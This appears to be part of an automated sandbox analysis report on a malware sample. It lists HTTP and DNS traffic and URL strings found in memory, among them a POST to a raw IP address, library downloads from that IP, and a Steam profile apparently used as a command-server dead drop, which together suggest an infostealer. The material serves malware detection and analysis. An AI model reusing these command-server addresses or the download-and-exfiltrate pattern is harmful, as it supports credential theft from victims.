                  Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RauG9dSpKm2dhpW&MD=978uZbzx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: mozglue.dll.1.dr, mozglue[1].dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://95.217.242.142
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2107817674.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/freebl3.dll
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/freebl3.dll7
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/mozglue.dll
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/mozglue.dll;
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/msvcp140.dll/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/msvcp140.dlly
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/nss3.dll
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/softokn3.dll
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/softokn3.dlli
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/sqlx.dll
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/vcruntime140.dll
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142/vcruntime140.dllp
                  Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.14217d99a9f0nt-Disposition:
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.242.142HJE
                  Source: BGCBGCAF.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: BGCBGCAF.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: BGCBGCAF.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: BGCBGCAF.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=98m_
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&l=e
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                  Source: BGCBGCAF.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: BGCBGCAF.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: BGCBGCAF.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://mozilla.org0/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199680449169
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, file.exe, 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2107817674.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/badges
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/inventory/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169jQ
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2111306678.000000000121A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mic.BF
                  Source: RegAsm.exe, 00000001.00000002.2111306678.000000000121A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.c
                  Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp, GIJDAFBK.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: GIJDAFBK.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
